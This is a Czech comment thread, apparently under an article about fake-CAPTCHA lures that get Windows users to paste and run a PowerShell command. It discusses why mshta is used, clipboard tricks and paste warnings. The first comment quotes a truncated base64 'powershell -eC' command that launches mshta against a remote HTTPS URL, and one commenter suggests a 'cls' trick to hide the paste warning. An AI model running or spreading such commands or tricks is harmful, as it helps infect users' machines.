Nevím o jaký operační systém se jedná (ale hádám, že děravý Win10+). Zkusil jsem to tedy u sebe ve Win7 a když jsem vložil a spustil ten zakódovaný příkaz (Win+R + CTRL+V + Enter), tak na mě vyskočilo velké oranžové okno s dotazem zda chci a nebo nechci spustit ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAY" a dokud jsem se nerozhodl, tak jsem nemohl spouštět další programy (suspend). Vůbec jsem nechápal proč bych ho kvůli Captcha měl spouštět, tak jsem ho ukončil. Takže u Win7 evidentně tento způsob infikování nefunguje...
Názor byl 2× upraven, naposled 29. 1. 2025 09:38
bylo by mi podezřelé to VIN+R a poté CTRL+V .. JENŽE.. POUŽÍVÁM LINUX 🤣🤣🤣Takže by asi měli Smolíka 🤣🤣, a na příkaz typu SU , nebo SUDO v terminálu sem přímo háklivej..🤣🤣😉
To je vážně někdo tak dutý že vloží a spustí cizí příkaz PowerShell u?
ono vás to v "zápalu boje" ani nemusi napadnout.. nechani vás hrát kousek nějaký hry, nebo něco jiného.. chceš nesmrtelnost, nebo jiny schopnosti ? vložte kód a potvrďte že jste člověk.. kromě toho.. kolik normálních Useru a BFA vi a zná co je PowerShell, WBS script, nebo makroscript? A viděl jsem pred nedávnem průzkum, kde si neuvěřitelný množství lidi stahlo škodlivý soubory jen díky slibu, že jim někdo slibil vyhodu zdarma nebo automatický výdělek přes PC. AVirus jmenem Windows je potřeba používat ideálně virtualizovany, na nějakém cloud serveru.. A jak říkám: obecně Neexistuje horší malware než Uživatel s přístupem do systému.. ( A pak je jedno jaký operační systém provozujete )Tenhle skript má aspoň tu nevýhodu, že cílí výhradně na Windows..Ale uz jsem se setkal s multiplatformním příkazem zneuzivajici chybu zabezpečení a spouštejícím vzdálený terminál a milé mi to nebylo..
Ano, ta drtiva vetsina "dutych" uzivatelu, co netusi, ze existuje neco jako PowerShell. Smir se s tim, ze malokdo dnes vi, jak pocitace dnes funguji a je to pro ne jen krabicka, ktera umi provozovat "Seznam", Excel a Word (v nejake podobne kombinaci).
Proč myslíte, že to udělá jen dutý člověk? Co třeba geniální hudebník nebo matematik, který ani neví, co je to powershell? Ti jsou podle vás dutí?
To je boží, to mi připomíná ten vtip:Jsem chudý balkánský virus. Smažte prosím náhodných 50 souborů z vašeho disku a pak mě pošlete deseti svým přátelům. Děkuji.
Nějak nechápu proč by měl powershell spouštět nějaký skript přes mshta, když může rovnou sám spustit powershell skript?
Třeba tam jsou nějaké bezpečnostní mechanismy, co v těch historických aplikacích ještě nebyly, takže jde dělat víc věcí bez varování?
Myslím, že nejde. Ukaž mi příklad něčeho, kde by bylo z hlediska malware výhodnější mshta
Názor byl 1× upraven, naposled 28. 1. 2025 12:06
Nevím, já to nepoužívám (powershell málo a mshta neznám). Nicméně když třeba něco uložím s příponou ps1, tak mi to powershell nespustí (píše chybu, že je spouštění skriptů zakázané, musí se někde něco nastavit). Když se mu to předá jako parametr, tak to pustí.
Na spuštění ps1 potřebuješ bypass třeba přes spuštění přes cmd, tu je ale řeč o spuštění powershell skriptu přímo v powershellu.
Nevím, ale kdyby to fungovalo stejně, tak proč by si to komplikovali? Třeba to nějaký důvod má...
https://redcanary.com/threat-detecti...ues/mshta/https://cyble.com/blog/increase-...024-21412/Aktualni (a nekolik minulych) verze Powershellu je velmi dobre auditovana a hlasi prakticky vse, co skript dela, cehoz hojne vyuzivaji antiviry a podobna EDR reseni. Pustit na modernich Windows neco skodliveho pres PowerShell neni uplne jednoduche, pokud tam zaroven bezi nejake slusne bezpecnostni reseni.Zatimco spusteni pres mshta tohle auditovani celkem slusne obchazi.
1. skript je dlouhý2. maskování
1) nerozumím, skript může být kratší než ten uvedený jako příklad v článku2) Jaképak maskování? Tu jde o to něco spustit a pak si člověk může dělat co chce, třeba skrytě.
Väčšina ľudí ani netuší, čo sa reálne deje vo virtuálnom svete. Prijímajú, čo im svet podhodí... Myslenie totiž bolí 😃 O pracovníkoch rôznych úradov, radšej pomlčím 😃
To není nic nového, o podobném problému se psalo už před časem. Při kopírování textu z webu se může zkopírovat něco jiného, než se zobrazuje. Což je celkem nebezpečné třeba v případě, kdy člověk z webu kopíruje třeba nějaký příkaz a vloží to do příkazové řádky. Reálně se může zkopírovat něco jiného i s koncem řádku, takže po vložení se to rovnou spustí.
"po vložení se to rovnou spustí"Nespustí!!! 😎Nevím co používáš za strarý Windows, ale minimálně ve Windows 11 24H2 ti po vkládání víceřádkového kódu do Terminálu Terminál nejdřív ukáže vkládaný kód a teprve po překontrolování a odsouhlasení kódu se vykoná.Platí to pro Terminál, i pro příkazovou řádku.
Názor byl 1× upraven, naposled 28. 1. 2025 11:27
Mám tu Win 11, 23H2 a tam to dělá. Stačí do notepadu dát třebadir *.*dir *.*zkopírovat a vložit do cmd/powershellu a ten první spustí.V terminálu to zobrazí varování a náhled na ten vkládaný text.Jestli to opravili, tak dobře..Nicméně ten problém bude širší, pointa je, že na zkopírovaná data se nedá spoléhat. Nějaký malware může třeba detekovat data ve schránce a čísla účtu (nebo dneska adresy kryptopeněženek) nahradit nějakým útočníka...
Ale to je něco jiného, než ten tvůj příklad s vkládáním, já komentoval ten, máš to uvádět na něčem vhodnějším, jak jsem psal, ve Windows 11 24H2 to platí i pro příkazovou řádku:https://i.imgur.com/Dnz5EdE.pngNespustí se to hned 😎😉
No ten nemám, psal jsem, že je dobře, že to tam dodělali. Otázka je, kolik lidí už tu verzi má. Ono jim to někdy trvá dlouho, než do notepadu dali klávesové zkratky a status bar, tak to taky bylo několik let... 🙂
stačí nakonec skriptu napsat Cls a požádat uživatele aby stisknul enter dvakrát rychle..🤣 ani si nevsimne varování..
Podvodník/podvodniceMonstra/monstryněDěkuji za opravu.
Názor byl 1× upraven, naposled 28. 1. 2025 10:04
Ono to může být i podvodňátko...
Potvrďte prosím přezdívku, kterou jsme náhodně vygenerovali, nebo si zvolte jinou. Zajistí, že váš profil bude unikátní.
Tato přezdívka je už obsazená, zvolte prosím jinou.